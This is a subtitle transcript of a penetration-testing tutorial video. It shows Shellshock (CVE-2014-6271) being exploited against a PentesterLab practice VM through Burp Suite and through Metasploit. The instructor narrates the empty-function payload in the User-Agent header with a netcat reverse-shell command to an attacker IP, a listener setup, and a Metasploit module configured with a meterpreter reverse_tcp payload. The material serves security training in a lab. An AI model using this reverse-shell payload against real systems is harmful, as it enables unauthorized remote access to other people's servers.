1 00:00:00,450 --> 00:00:01,740 Instructor: Welcome back. 2 00:00:01,740 --> 00:00:02,940 It is time that we cover 3 00:00:02,940 --> 00:00:06,270 our first vulnerability in a website. 4 00:00:06,270 --> 00:00:08,189 And as a first vulnerability, 5 00:00:08,189 --> 00:00:11,043 I've chosen to show you the Shellshock Exploitation. 6 00:00:11,970 --> 00:00:14,970 Now, Shellshock is an older vulnerability. 7 00:00:14,970 --> 00:00:17,220 It was discovered in 2014 8 00:00:17,220 --> 00:00:20,040 and you will most likely never find it today 9 00:00:20,040 --> 00:00:22,500 while performing penetration tests. 10 00:00:22,500 --> 00:00:25,080 But nonetheless, I want to show it to you 11 00:00:25,080 --> 00:00:28,200 just because of the impact that it had. 12 00:00:28,200 --> 00:00:31,230 Shellshock is considered one of the most critical 13 00:00:31,230 --> 00:00:34,680 and serious vulnerabilities ever discovered. 14 00:00:34,680 --> 00:00:36,150 This vulnerability occurred 15 00:00:36,150 --> 00:00:41,150 due to bash differently processing environmental variables. 16 00:00:41,310 --> 00:00:43,020 With this many things were hit 17 00:00:43,020 --> 00:00:44,573 from DHCP clients 18 00:00:44,573 --> 00:00:46,560 from terminal command lines 19 00:00:46,560 --> 00:00:49,830 to CGI scripts inside of a web applications. 20 00:00:49,830 --> 00:00:52,710 And in this tutorial we will see an example 21 00:00:52,710 --> 00:00:56,040 of exploiting ShellShock through the CGI script 22 00:00:56,040 --> 00:00:58,050 on a webpage. 23 00:00:58,050 --> 00:00:59,280 Also for this, 24 00:00:59,280 --> 00:01:01,830 we are going to download a small ISO file 25 00:01:01,830 --> 00:01:04,500 that will allow us to run a virtual machine 26 00:01:04,500 --> 00:01:07,140 only for this vulnerability. 27 00:01:07,140 --> 00:01:10,170 Don't worry, it'll only take a few seconds to install 28 00:01:10,170 --> 00:01:12,630 due to it being a small virtual machine 29 00:01:12,630 --> 00:01:14,400 and it is only purposely designed 30 00:01:14,400 --> 00:01:17,100 for this specific vulnerability. 31 00:01:17,100 --> 00:01:19,560 To download it, you want to go to your Google, 32 00:01:19,560 --> 00:01:22,440 you can type in pentesterlab shellshock, 33 00:01:22,440 --> 00:01:24,210 and you should see a link like this 34 00:01:24,210 --> 00:01:29,210 that says CVE-2014-6271 called ShellShock. 35 00:01:30,750 --> 00:01:33,300 It'll be from the pentesterlab.com 36 00:01:33,300 --> 00:01:35,370 and you want to click on it 37 00:01:35,370 --> 00:01:37,920 and it'll navigate you to this page right here 38 00:01:37,920 --> 00:01:40,110 where you will have the ShellShock introduction, 39 00:01:40,110 --> 00:01:41,220 fingerprinting 40 00:01:41,220 --> 00:01:44,100 and all the other stuff regarding this vulnerability. 41 00:01:44,100 --> 00:01:48,120 However, we're not going to go into these details right here 42 00:01:48,120 --> 00:01:51,120 because we want to exploit it ourselves. 43 00:01:51,120 --> 00:01:55,050 What we want to do is we want to go to the Files right here 44 00:01:55,050 --> 00:01:56,910 and you should see this ISO 45 00:01:56,910 --> 00:01:58,200 where you want to click on it 46 00:01:58,200 --> 00:02:00,690 and it'll download the ISO image 47 00:02:00,690 --> 00:02:04,110 with the size of 19.1 megabytes. 48 00:02:04,110 --> 00:02:06,513 so you can see it is really, really small. 49 00:02:07,380 --> 00:02:09,750 Once you do that, you want to go to your virtual box 50 00:02:09,750 --> 00:02:13,680 and you want to create a virtual machine as we usually do. 51 00:02:13,680 --> 00:02:16,650 Now, I already got shellshocklab created 52 00:02:16,650 --> 00:02:18,870 with the ISO file that we just downloaded 53 00:02:18,870 --> 00:02:20,550 but what you essentially want to do 54 00:02:20,550 --> 00:02:22,200 is you want to click on New, 55 00:02:22,200 --> 00:02:23,850 then you can call it anything you want. 56 00:02:23,850 --> 00:02:26,310 You can call it shellshock. 57 00:02:26,310 --> 00:02:29,310 You can select right here, Linux as an operating system 58 00:02:29,310 --> 00:02:33,690 and the version of Linux is going to be Other Linux 32 bit. 59 00:02:33,690 --> 00:02:34,830 Click on that. 60 00:02:34,830 --> 00:02:36,480 Then you can proceed to Next. 61 00:02:36,480 --> 00:02:39,300 You can leave it to 256 megabytes of RAM. 62 00:02:39,300 --> 00:02:41,550 That is more than enough for this machine. 63 00:02:41,550 --> 00:02:43,110 Click on Next right here. 64 00:02:43,110 --> 00:02:45,150 We want to create a virtual machine 65 00:02:45,150 --> 00:02:46,350 Next here. 66 00:02:46,350 --> 00:02:47,370 Next here as well. 67 00:02:47,370 --> 00:02:49,623 And we can click on Create. 68 00:02:50,700 --> 00:02:51,533 And as usual, 69 00:02:51,533 --> 00:02:53,220 there are two more things that we want to do 70 00:02:53,220 --> 00:02:55,020 once we create a new virtual machine. 71 00:02:55,020 --> 00:02:57,690 We want to navigate to the Settings. 72 00:02:57,690 --> 00:03:00,060 From the Settings, we want to go to Network, 73 00:03:00,060 --> 00:03:03,420 switch from the NAT to Bridged Adapter. 74 00:03:03,420 --> 00:03:05,160 Select your adapter right here. 75 00:03:05,160 --> 00:03:06,840 And another thing that we want to do 76 00:03:06,840 --> 00:03:09,540 is we want to add our ISO file. 77 00:03:09,540 --> 00:03:11,883 So delete this Empty right here, 78 00:03:13,140 --> 00:03:14,880 click on the disc icon, 79 00:03:14,880 --> 00:03:16,440 click on add, 80 00:03:16,440 --> 00:03:18,750 and find the ISO file. 81 00:03:18,750 --> 00:03:23,750 In my case, here it is, CVE-2014-6271. 82 00:03:23,880 --> 00:03:27,150 Click on Choose and click on OK. 83 00:03:27,150 --> 00:03:30,330 This will create your ShellShock virtual machine. 84 00:03:30,330 --> 00:03:33,240 After you do that, you want to go to your Kali Linux, 85 00:03:33,240 --> 00:03:36,390 start your Burp Suite tool that we covered already, 86 00:03:36,390 --> 00:03:38,460 that we covered the configuration of 87 00:03:38,460 --> 00:03:41,430 and you want to go start it up. 88 00:03:41,430 --> 00:03:45,360 And after you start it up, you can open your Firefox. 89 00:03:45,360 --> 00:03:47,550 Now you might have noticed if you tried 90 00:03:47,550 --> 00:03:48,630 before watching this video 91 00:03:48,630 --> 00:03:51,660 that once you try to visit Firefox 92 00:03:51,660 --> 00:03:54,000 without having Burp Suite running, 93 00:03:54,000 --> 00:03:56,460 you will not be able to visit any page. 94 00:03:56,460 --> 00:03:58,560 And that is because we set our Burp Suite 95 00:03:58,560 --> 00:04:01,050 to be a proxy for our Firefox. 96 00:04:01,050 --> 00:04:03,900 So now every time you want to visit Firefox page 97 00:04:03,900 --> 00:04:05,514 or any website page, 98 00:04:05,514 --> 00:04:08,610 you must have Burp Suite open. 99 00:04:08,610 --> 00:04:11,460 And you must also have the intercept turned off 100 00:04:11,460 --> 00:04:14,190 so it doesn't intercept any packets. 101 00:04:14,190 --> 00:04:17,790 Otherwise your page will just load forever. 102 00:04:17,790 --> 00:04:20,250 Now that we opened the Firefox, 103 00:04:20,250 --> 00:04:21,899 let us open Burp Suite too. 104 00:04:21,899 --> 00:04:23,280 It is starting the project 105 00:04:23,280 --> 00:04:25,140 and as soon as it opens up, 106 00:04:25,140 --> 00:04:27,630 we'll be able to visit our page 107 00:04:27,630 --> 00:04:30,240 on our ShellShock virtual machine. 108 00:04:30,240 --> 00:04:32,400 Okay, so now that Burp Suite opened, 109 00:04:32,400 --> 00:04:34,830 go to Target, then go to proxy 110 00:04:34,830 --> 00:04:38,340 and turn off the intercept right here. 111 00:04:38,340 --> 00:04:40,710 So Intercept should be off. 112 00:04:40,710 --> 00:04:41,730 Once you do that 113 00:04:41,730 --> 00:04:43,290 the next thing that we want to do 114 00:04:43,290 --> 00:04:47,100 is we want to start our ShellShock virtual machine. 115 00:04:47,100 --> 00:04:48,930 If you're starting it for the first time 116 00:04:48,930 --> 00:04:51,660 it should only take a few seconds to set everything up 117 00:04:51,660 --> 00:04:54,720 since it is a really, really small virtual machine. 118 00:04:54,720 --> 00:04:58,710 And once it opens up, it won't even prompt you for a login. 119 00:04:58,710 --> 00:04:59,940 There is no login available 120 00:04:59,940 --> 00:05:01,893 inside of this machine right here. 121 00:05:03,000 --> 00:05:05,430 It will just enter the command line 122 00:05:05,430 --> 00:05:07,050 where we want to type ifconfig 123 00:05:07,050 --> 00:05:09,300 just to find out the IP address of this machine. 124 00:05:09,300 --> 00:05:13,650 And in this case, it is 192.168.1.10. 125 00:05:13,650 --> 00:05:14,940 So all we want to do 126 00:05:14,940 --> 00:05:17,130 is we want to go to our Firefox 127 00:05:17,130 --> 00:05:20,313 and visit this page to see what we have. 128 00:05:21,750 --> 00:05:26,750 And this seems to be the entire page of this virtual machine 129 00:05:27,060 --> 00:05:29,460 We get this system is running, 130 00:05:29,460 --> 00:05:30,570 the time that it is running, 131 00:05:30,570 --> 00:05:33,330 currently for zero minutes because we just started it up 132 00:05:33,330 --> 00:05:36,213 and we get the kernel of that virtual machine. 133 00:05:37,290 --> 00:05:40,050 Now if we take a look at our Burp Suite right now 134 00:05:40,050 --> 00:05:41,850 and we go to the Targets 135 00:05:41,850 --> 00:05:43,950 and we go to our IP address 136 00:05:43,950 --> 00:05:46,230 of the ShellShock Virtual Machine 137 00:05:46,230 --> 00:05:49,320 we will see all the links that we requested, 138 00:05:49,320 --> 00:05:51,120 ones trying to of the webpage 139 00:05:51,120 --> 00:05:54,060 of our ShellShock virtual machine. 140 00:05:54,060 --> 00:05:56,190 We will see this slash directory. 141 00:05:56,190 --> 00:05:58,020 We will see this JavaScript file 142 00:05:58,020 --> 00:06:02,610 and we will see this cgi-bin status directory. 143 00:06:02,610 --> 00:06:06,300 So we get a CGI script right here. 144 00:06:06,300 --> 00:06:09,870 If we go to the response of that request that we sent 145 00:06:09,870 --> 00:06:10,830 and to do that, 146 00:06:10,830 --> 00:06:14,220 you simply just select the request that you want to go to 147 00:06:14,220 --> 00:06:17,430 and click on Response right here. 148 00:06:17,430 --> 00:06:18,690 Then we will see down here, 149 00:06:18,690 --> 00:06:21,420 this output that looks a lot 150 00:06:21,420 --> 00:06:25,440 like an output to the command, uname -a. 151 00:06:25,440 --> 00:06:28,230 For example, if you run the command uname -a 152 00:06:28,230 --> 00:06:29,490 inside of your terminal, 153 00:06:29,490 --> 00:06:32,010 it'll give you an output like this 154 00:06:32,010 --> 00:06:34,590 which will tell you which version of Linux are you running 155 00:06:34,590 --> 00:06:36,360 and so on and so on. 156 00:06:36,360 --> 00:06:39,240 We get a similar output inside of our Burp Suite 157 00:06:39,240 --> 00:06:41,073 as we can see right here. 158 00:06:42,180 --> 00:06:45,780 And in most cases, this output is ran 159 00:06:45,780 --> 00:06:49,950 by the uname -i command and it is ran by bash. 160 00:06:49,950 --> 00:06:52,860 And inside this request that we did 161 00:06:52,860 --> 00:06:56,280 User-Agent field that we got inside of the request 162 00:06:56,280 --> 00:06:58,350 is an environmental variable 163 00:06:58,350 --> 00:07:02,130 when processed inside of this CGI script. 164 00:07:02,130 --> 00:07:06,660 So what we can try is to inject the command in that field. 165 00:07:06,660 --> 00:07:09,600 However, it won't work that easy. 166 00:07:09,600 --> 00:07:10,830 We can't just inject, 167 00:07:10,830 --> 00:07:14,010 for example, whoami command instead of this. 168 00:07:14,010 --> 00:07:16,830 It'll not give us any output back. 169 00:07:16,830 --> 00:07:18,000 You might be asking why? 170 00:07:18,000 --> 00:07:20,160 Well, because ShellShock vulnerability 171 00:07:20,160 --> 00:07:24,210 is based on first specifying an empty function. 172 00:07:24,210 --> 00:07:26,160 And I know this might sound confusing 173 00:07:26,160 --> 00:07:28,350 but just stick with me for a couple more minutes 174 00:07:28,350 --> 00:07:30,870 and I will explain it how it works. 175 00:07:30,870 --> 00:07:33,450 The vulnerability itself was discovered 176 00:07:33,450 --> 00:07:35,790 when inside of an environmental variable 177 00:07:35,790 --> 00:07:37,590 such as this user agent 178 00:07:37,590 --> 00:07:41,040 empty function syntax was specified 179 00:07:41,040 --> 00:07:45,690 and empty function syntax looks something like this. 180 00:07:45,690 --> 00:07:47,790 Let me show you inside the terminal. 181 00:07:47,790 --> 00:07:49,650 It is this set of characters. 182 00:07:49,650 --> 00:07:51,600 So open bracket, closed bracket, 183 00:07:51,600 --> 00:07:54,570 then space, open curly bracket, 184 00:07:54,570 --> 00:07:58,290 then space, two dots, dot and comma 185 00:07:58,290 --> 00:08:00,480 and closed curly bracket 186 00:08:00,480 --> 00:08:03,240 and at the end another dot and comma. 187 00:08:03,240 --> 00:08:08,240 And this right here is a syntax for an empty function. 188 00:08:08,310 --> 00:08:10,560 So any command that we want to run, 189 00:08:10,560 --> 00:08:14,220 before it, we must have this empty function syntax. 190 00:08:14,220 --> 00:08:15,053 Why? 191 00:08:15,053 --> 00:08:19,080 Well, when bash gets these characters in this order 192 00:08:19,080 --> 00:08:22,950 or if bash gets this empty function with the variable 193 00:08:22,950 --> 00:08:25,380 instead of blocking it, it'll accept it 194 00:08:25,380 --> 00:08:27,150 with the variable that comes after 195 00:08:27,150 --> 00:08:30,570 and it runs it as a command on the server 196 00:08:30,570 --> 00:08:32,970 and that is the entire vulnerability. 197 00:08:32,970 --> 00:08:36,960 All we have to do is to specify a command after the syntax 198 00:08:36,960 --> 00:08:38,820 and it should work. 199 00:08:38,820 --> 00:08:43,200 Now to do that, we must send this HTTP request right here 200 00:08:43,200 --> 00:08:46,800 to this cgi-bin script once again. 201 00:08:46,800 --> 00:08:49,680 And we must specify instead of the user agent 202 00:08:49,680 --> 00:08:53,130 the empty function syntax and then our command. 203 00:08:53,130 --> 00:08:54,450 So how can we do that? 204 00:08:54,450 --> 00:08:56,550 How can we send the request once again? 205 00:08:56,550 --> 00:09:00,060 Well, luckily Burp Suite allows us to edit our requests 206 00:09:00,060 --> 00:09:03,300 and send them as many times as we want. 207 00:09:03,300 --> 00:09:05,700 All we need to do is to select the request 208 00:09:05,700 --> 00:09:07,500 that we want to send again. 209 00:09:07,500 --> 00:09:09,240 So we select it right here. 210 00:09:09,240 --> 00:09:13,950 Then we right-click and Send to Repeater right here. 211 00:09:13,950 --> 00:09:16,860 Then you will see this Repeater part light up. 212 00:09:16,860 --> 00:09:17,970 We want to go there 213 00:09:17,970 --> 00:09:22,830 and here we can edit our request before actually sending it. 214 00:09:22,830 --> 00:09:25,290 So we mentioned that we want to inject the command 215 00:09:25,290 --> 00:09:27,090 inside of the User-Agent field. 216 00:09:27,090 --> 00:09:28,743 Let us remove this. 217 00:09:30,690 --> 00:09:34,890 And let's type the syntax for the empty function first. 218 00:09:34,890 --> 00:09:37,950 So open and closed bracket, then empty space, 219 00:09:37,950 --> 00:09:42,950 open curly bracket, then space, two dots, comma and dot 220 00:09:43,200 --> 00:09:46,413 closed curly bracket and comma and dot at the end. 221 00:09:47,310 --> 00:09:48,720 Now what you can do after this 222 00:09:48,720 --> 00:09:50,877 is you can inject your command. 223 00:09:50,877 --> 00:09:53,340 And if you want to, you can test to see 224 00:09:53,340 --> 00:09:56,040 if it works with the ping command first. 225 00:09:56,040 --> 00:09:58,080 But I'm not going to test it with the ping command. 226 00:09:58,080 --> 00:10:01,530 I'm going to straight away try to establish a connection 227 00:10:01,530 --> 00:10:05,400 with our Kali Linux machine and get a reverse shell back. 228 00:10:05,400 --> 00:10:06,810 So what do we want to do right here 229 00:10:06,810 --> 00:10:09,420 to establish a connection with our Kali Linux machine? 230 00:10:09,420 --> 00:10:14,420 Well, we want to execute /bin/bash 231 00:10:14,790 --> 00:10:16,200 and this will tell the targets 232 00:10:16,200 --> 00:10:18,030 to execute the following command. 233 00:10:18,030 --> 00:10:20,050 If we specify dash c after, 234 00:10:20,050 --> 00:10:23,280 it'll tell our target that whatever we send after this 235 00:10:23,280 --> 00:10:24,600 will be our command 236 00:10:24,600 --> 00:10:27,780 and we must specify it between the single quotes. 237 00:10:27,780 --> 00:10:30,900 So for now, we have the empty function syntax 238 00:10:30,900 --> 00:10:34,620 then /bin/bash -c 239 00:10:34,620 --> 00:10:36,900 then open single quotes and close single quotes 240 00:10:36,900 --> 00:10:38,430 and in between the quotes 241 00:10:38,430 --> 00:10:41,100 we type nc which stands for Netcat 242 00:10:41,100 --> 00:10:44,550 and we specify the IP address of our Kali Linux machine. 243 00:10:44,550 --> 00:10:46,915 So let's check it out right here, 244 00:10:46,915 --> 00:10:50,730 sudo ifconfig, test1234 is my password 245 00:10:50,730 --> 00:10:54,570 and I will specify 192.168.1.9. 246 00:10:54,570 --> 00:10:59,160 So right here, 192.168.1.9. 247 00:10:59,160 --> 00:11:02,790 And I want to specify also the port to connect to. 248 00:11:02,790 --> 00:11:05,910 In my case I will use port 12345, 249 00:11:05,910 --> 00:11:07,380 it doesn't really matter. 250 00:11:07,380 --> 00:11:10,800 And at the end we want to specify -e, 251 00:11:10,800 --> 00:11:13,020 which stands for what we want to execute 252 00:11:13,020 --> 00:11:14,400 on our target machine. 253 00:11:14,400 --> 00:11:17,400 And we want to simply just use the bash shell. 254 00:11:17,400 --> 00:11:21,840 So we can do that by specifying slash bin and slash bash. 255 00:11:21,840 --> 00:11:23,760 And this is the entire command. 256 00:11:23,760 --> 00:11:27,930 I will copy it to my terminal so you can see it enlarged. 257 00:11:27,930 --> 00:11:32,930 So copy and if I clear the screen, paste it right here. 258 00:11:34,710 --> 00:11:36,630 This is our entire command. 259 00:11:36,630 --> 00:11:38,670 The empty functions syntax 260 00:11:38,670 --> 00:11:40,170 and then the function 261 00:11:40,170 --> 00:11:42,150 that allows us to establish a connection 262 00:11:42,150 --> 00:11:44,040 to our Kali Linux machine. 263 00:11:44,040 --> 00:11:47,340 But before we send this request from our Burp Suite, 264 00:11:47,340 --> 00:11:49,530 we must set up a listener right here. 265 00:11:49,530 --> 00:11:52,830 So I'm just going to go and type nc -lvp 266 00:11:52,830 --> 00:11:57,150 and then on the port that we specified which is 12345. 267 00:11:57,150 --> 00:11:58,350 Press enter. 268 00:11:58,350 --> 00:12:00,510 This will listen for the incoming connections. 269 00:12:00,510 --> 00:12:04,470 And now that we change the User-Agent field to our command 270 00:12:04,470 --> 00:12:06,153 we can click on Send. 271 00:12:07,050 --> 00:12:09,840 If I go back to our Kali Linux terminal 272 00:12:09,840 --> 00:12:11,790 we can see we got the connection 273 00:12:11,790 --> 00:12:14,067 from our ShellShock virtual machine. 274 00:12:14,067 --> 00:12:17,130 And if we try to execute commands such as whoami 275 00:12:17,130 --> 00:12:18,780 all of that will work. 276 00:12:18,780 --> 00:12:20,847 We can see we are the pentesterlab. 277 00:12:20,847 --> 00:12:23,790 The ls command will give me all of the directories 278 00:12:23,790 --> 00:12:26,040 inside of the current directory. 279 00:12:26,040 --> 00:12:29,400 I can type the pwd to check out my current working directory 280 00:12:29,400 --> 00:12:34,400 and I am in the /var/www/cgi-bin folder. 281 00:12:36,060 --> 00:12:36,893 Great. 282 00:12:36,893 --> 00:12:39,630 So we successfully exploited the shock vulnerability 283 00:12:39,630 --> 00:12:43,110 and gained access to this machine. 284 00:12:43,110 --> 00:12:46,440 Now you can also automate this entire process 285 00:12:46,440 --> 00:12:48,690 with Metasploit framework. 286 00:12:48,690 --> 00:12:49,830 So what we did right here 287 00:12:49,830 --> 00:12:52,560 is we manually exploited the target 288 00:12:52,560 --> 00:12:54,180 with the help of our Burp Suite. 289 00:12:54,180 --> 00:12:58,410 We sent our request for the CGI bin script to the repeater 290 00:12:58,410 --> 00:13:00,990 then we changed the user field to our command 291 00:13:00,990 --> 00:13:03,840 which requires the empty syntax at the beginning 292 00:13:03,840 --> 00:13:06,300 and after it the command that we want to execute 293 00:13:06,300 --> 00:13:08,970 which can be any command that you really want. 294 00:13:08,970 --> 00:13:11,280 Then we set up a listener inside of our terminal 295 00:13:11,280 --> 00:13:14,280 and we sent this packet once again 296 00:13:14,280 --> 00:13:16,920 or we sent this request once again. 297 00:13:16,920 --> 00:13:19,710 Right here we can see the response to this request 298 00:13:19,710 --> 00:13:23,070 and it tells us that we got the internal server error 299 00:13:23,070 --> 00:13:26,460 because it doesn't really recognize this user agent. 300 00:13:26,460 --> 00:13:29,160 However, it did execute this command 301 00:13:29,160 --> 00:13:31,440 which is all that we want. 302 00:13:31,440 --> 00:13:33,060 Inside of the Metasploit framework 303 00:13:33,060 --> 00:13:35,110 you can type search shellshock 304 00:13:36,960 --> 00:13:39,240 and you can use this exploit right here 305 00:13:39,240 --> 00:13:43,680 which is exploit/multi/http/apache_mod_cgi_bash 306 00:13:43,680 --> 00:13:45,870 environmental execution. 307 00:13:45,870 --> 00:13:47,010 You can copy that, 308 00:13:47,010 --> 00:13:50,370 type use and then paste the selection. 309 00:13:50,370 --> 00:13:51,510 It'll set our payload 310 00:13:51,510 --> 00:13:55,290 to be linux/x86/meterpreter/reverse_tcp 311 00:13:55,290 --> 00:13:57,333 and if I type show options, 312 00:13:58,530 --> 00:14:00,570 I can set my options right here. 313 00:14:00,570 --> 00:14:03,180 So what I must set is the RHOSTS 314 00:14:03,180 --> 00:14:05,820 which is the IP address of my target machine. 315 00:14:05,820 --> 00:14:06,963 Let's do that first. 316 00:14:10,080 --> 00:14:12,930 What I also must set is this RPATH. 317 00:14:12,930 --> 00:14:16,890 So this will be the path to the CGI script. 318 00:14:16,890 --> 00:14:21,890 So the RPATH must be set to cgi-bin/status. 319 00:14:24,060 --> 00:14:25,230 If I'm not mistaken 320 00:14:25,230 --> 00:14:26,490 that is the path. 321 00:14:26,490 --> 00:14:29,460 Let us see inside of our Burp Suite. 322 00:14:29,460 --> 00:14:34,460 So it indeed is cgi-bin and then status. 323 00:14:34,590 --> 00:14:37,208 And all we're left to do right now 324 00:14:37,208 --> 00:14:40,800 is set this and run our exploit. 325 00:14:40,800 --> 00:14:42,600 So, oh pardon of me, it's not there. 326 00:14:42,600 --> 00:14:46,350 Let us just go and set the TARGETURI. 327 00:14:46,350 --> 00:14:47,670 It is TARGETURI 328 00:14:47,670 --> 00:14:50,310 that we must set to be the /cgi-bin/status. 329 00:14:50,310 --> 00:14:54,423 So let's just set the TARGETURI instead. 330 00:14:56,100 --> 00:14:59,640 And let's set the RPATH back to slash bin, I believe. 331 00:14:59,640 --> 00:15:01,380 And let's give this a try. 332 00:15:01,380 --> 00:15:05,073 We send this, we get the meterpreter session one opened. 333 00:15:06,180 --> 00:15:07,680 And here it is, 334 00:15:07,680 --> 00:15:09,330 get user id 335 00:15:09,330 --> 00:15:11,310 will tell us who we are. 336 00:15:11,310 --> 00:15:13,290 We can execute the commands 337 00:15:13,290 --> 00:15:14,640 and we can do everything 338 00:15:14,640 --> 00:15:17,580 that we did inside of our exploitation section. 339 00:15:17,580 --> 00:15:20,820 So we successfully exploited ShellShock vulnerability 340 00:15:20,820 --> 00:15:22,380 in two different ways, 341 00:15:22,380 --> 00:15:24,390 manually by using Burp Suite 342 00:15:24,390 --> 00:15:26,880 and sending our command in the User-Agent field 343 00:15:26,880 --> 00:15:31,320 and with the help of this Metasploit framework module. 344 00:15:31,320 --> 00:15:34,050 It also exploited the User-Agent field 345 00:15:34,050 --> 00:15:35,850 as we can see right here. 346 00:15:35,850 --> 00:15:39,120 We told the path to be /cgi-bin/status 347 00:15:39,120 --> 00:15:41,640 and we got the meterpreter reverse shell back. 348 00:15:41,640 --> 00:15:42,473 Great. 349 00:15:42,473 --> 00:15:43,410 Now that we did this 350 00:15:43,410 --> 00:15:45,420 in the next video we're going to check out 351 00:15:45,420 --> 00:15:46,950 a very similar thing to this 352 00:15:46,950 --> 00:15:49,500 which is called command injection. 353 00:15:49,500 --> 00:15:50,800 See you in the next video.